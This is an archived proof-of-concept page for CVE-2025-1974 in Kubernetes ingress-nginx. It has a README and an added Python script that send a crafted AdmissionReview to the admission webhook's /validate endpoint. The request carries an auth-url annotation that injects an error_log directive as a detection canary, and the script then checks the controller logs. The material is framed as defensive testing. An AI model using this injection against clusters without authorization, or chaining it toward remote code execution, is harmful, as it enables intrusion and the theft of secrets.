Related vulnerability
Title:
Kubernetes ingress-nginx security vulnerability
(CVE-2025-1974)
Description: Kubernetes ingress-nginx is the Kubernetes ingress controller open-sourced by the Cloud Native Computing Foundation; it uses NGINX as a reverse proxy and load balancer. Kubernetes ingress-nginx has a security vulnerability: under certain conditions, an unauthenticated attacker with access to the pod network can execute arbitrary code in the context of the ingress-nginx controller, which may lead to disclosure of Secrets.
Description
A minimal test tool to help detect annotation injection in Kubernetes NGINX Ingress controllers. The script sends a crafted AdmissionReview request that simulates the first step of the exploit path behind CVE-2025-1974 and then prompts the operator to check the controller logs for signs that the annotation value was interpreted as NGINX configuration.
Introduction
# 🚨 Log Injection Test via Ingress-NGINX Admission Controller
## 🧠 Overview
This script tests for annotation injection vulnerabilities in Kubernetes clusters using the NGINX Ingress Controller. It is meant for **detection purposes only** in relation to [CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974), which allows malicious annotations to influence NGINX configuration.
## 📚 Background
The vulnerability, disclosed by Wiz.io ([blog post](https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities)), stems from annotation values that the controller copies into the generated `nginx.conf` without adequate validation, so attacker-controlled text is parsed as NGINX directives. For instance:
```yaml
nginx.ingress.kubernetes.io/auth-url: "http://placeholder/#; error_log /root/this_path_shouldnt_exist.log debug; #"
```
If the controller renders this value, the URL ends at the `#`, the `;` closes the directive NGINX was building, and `error_log /root/this_path_shouldnt_exist.log debug;` becomes a directive of its own; the trailing `#` comments out the rest of the line. Because the controller's NGINX process runs unprivileged, testing the configuration then fails with a permission error on the `/root` path. In the full attack described in the Wiz write-up, this kind of injection is chained further to achieve **remote code execution (RCE)** inside the controller pod.
## 🛠️ What This Script Does
1. Loads a crafted `AdmissionReview` payload from a YAML file.
2. Sends it to the admission controller's `/validate` endpoint.
3. Prompts the user to check ingress controller logs for results.
## 📁 Files
- `admission_review.yaml`: Contains the crafted AdmissionReview request.
- `main.py`: Sends the payload to the controller.
## 🚀 Usage
First, forward the admission controller port:
```bash
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 8443:443
```
Then run:
```bash
python main.py --url https://localhost:8443
```
## 🔍 Expected Result
Check ingress controller logs:
```bash
kubectl logs -n ingress-nginx -l app.kubernetes.io/component=controller
```
You may see:
```
nginx: [emerg] open() "/root/this_path_shouldnt_exist.log" failed (13: Permission denied)
```
This indicates that the injected text was rendered into the controller's generated configuration and parsed as an `error_log` directive when the admission webhook ran `nginx -t` on it. No Ingress object is created by this test: the request goes straight to the webhook, not through the API server. A patched controller should reject the annotation (a denied AdmissionReview response) and produce no such log line.
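The following is an added example, not the repository's `main.py` or `admission_review.yaml`, that does what the "What This Script Does" and "Expected Result" sections describe in one place: it builds a standard `admission.k8s.io/v1` AdmissionReview carrying the README's `auth-url` payload, POSTs it to the port-forwarded `/validate` endpoint, reports whether the webhook allowed the Ingress, and scans controller log text for the `[emerg] open()` line that names the canary path. The namespace, Ingress name, host, backend service name and the sample log lines are constructed placeholders; only the annotation value and the expected log line come from the page.

```python
"""Added example (not the repository's code): craft the AdmissionReview,
post it to the ingress-nginx admission webhook, and scan logs for the canary."""
import json
import re
import ssl
import sys
import urllib.request
import uuid

# Annotation value from the README: '#' ends the URL, ';' closes the directive
# NGINX was building, and the trailing '#' comments out whatever follows.
INJECTED_AUTH_URL = (
    "http://placeholder/#; error_log /root/this_path_shouldnt_exist.log debug; #"
)
CANARY_PATH = "/root/this_path_shouldnt_exist.log"
AUTH_URL_ANNOTATION = "nginx.ingress.kubernetes.io/auth-url"


def build_admission_review(namespace="default", name="annotation-injection-test",
                           auth_url=INJECTED_AUTH_URL):
    """Standard AdmissionReview for a CREATE of an Ingress. Namespace, name, host
    and backend service are placeholders (assumed, not from the page). Nothing is
    created in the cluster: the request bypasses the API server entirely."""
    ingress = {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "Ingress",
        "metadata": {
            "name": name,
            "namespace": namespace,
            "annotations": {AUTH_URL_ANNOTATION: auth_url},
        },
        "spec": {
            "ingressClassName": "nginx",
            "rules": [{
                "host": "placeholder.example",
                "http": {"paths": [{
                    "path": "/",
                    "pathType": "Prefix",
                    "backend": {"service": {"name": "placeholder", "port": {"number": 80}}},
                }]},
            }],
        },
    }
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "request": {
            "uid": str(uuid.uuid4()),
            "kind": {"group": "networking.k8s.io", "version": "v1", "kind": "Ingress"},
            "resource": {"group": "networking.k8s.io", "version": "v1", "resource": "ingresses"},
            "namespace": namespace,
            "name": name,
            "operation": "CREATE",
            "userInfo": {"username": "annotation-injection-test"},
            "object": ingress,
        },
    }


def send_admission_review(base_url, review, timeout=10):
    """POST the review to <base_url>/validate. The port-forwarded admission service
    presents a self-signed certificate, so verification is disabled for this local test."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(
        base_url.rstrip("/") + "/validate",
        data=json.dumps(review).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, context=ctx, timeout=timeout) as resp:
        return json.loads(resp.read())


def webhook_allowed(review_response):
    """True if the webhook accepted the Ingress; a patched controller should deny it."""
    return bool(review_response.get("response", {}).get("allowed", False))


EMERG_OPEN_RE = re.compile(r'nginx: \[emerg\] open\(\) "(?P<path>[^"]+)" failed')


def find_injection_evidence(log_text, canary=CANARY_PATH):
    """Return the [emerg] open() paths in controller log text that equal the canary.
    A hit means the injected text reached `nginx -t` as a real error_log directive."""
    hits = []
    for line in log_text.splitlines():
        m = EMERG_OPEN_RE.search(line)
        if m and m.group("path") == canary:
            hits.append(m.group("path"))
    return hits


# Constructed sample log text (not captured from a real cluster) for offline checks.
SAMPLE_CONTROLLER_LOG = """\
I0324 10:15:02.112233 7 controller.go:190] "Configuration changes detected, backend reload required"
nginx: [emerg] open() "/root/this_path_shouldnt_exist.log" failed (13: Permission denied)
nginx: configuration file /tmp/nginx/nginx-cfg123456 test failed
"""

if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "https://localhost:8443"
    resp = send_admission_review(base, build_admission_review())
    print("webhook allowed:", webhook_allowed(resp))
    print(json.dumps(resp, indent=2))
```

Run it against the port-forward from the Usage section (`python example.py https://localhost:8443`), then feed the output of the `kubectl logs` command to `find_injection_evidence` to confirm whether the canary path appeared. An `allowed: true` response together with the `[emerg]` line means the controller rendered the annotation into configuration; a denied response with no such line is the behaviour expected from a patched controller.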
## ⚠️ Warning
For **educational and authorized testing only**. Do not run on systems without permission.
## 🔗 References
- [Wiz Blog: Breaking Ingress NGINX](https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities)
- [NGINX Ingress Annotations](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/)
- [CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974)
---
Use this tool to check whether your cluster's ingress-nginx admission controller still renders injected annotation values into NGINX configuration. Exploitation of this vulnerability may be part of a broader attack chain leading to remote code execution.
File snapshot
[4.0K] /data/pocs/d1bb4b8e135a42b14e973da1f6ed94ba108d46b4
├── [ 868] admission_review.yaml
├── [1.3K] main.py
└── [2.5K] README.md
0 directories, 3 files
Notes
1. It is recommended to access the POC through the original source first.
2. If the source has been taken down or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.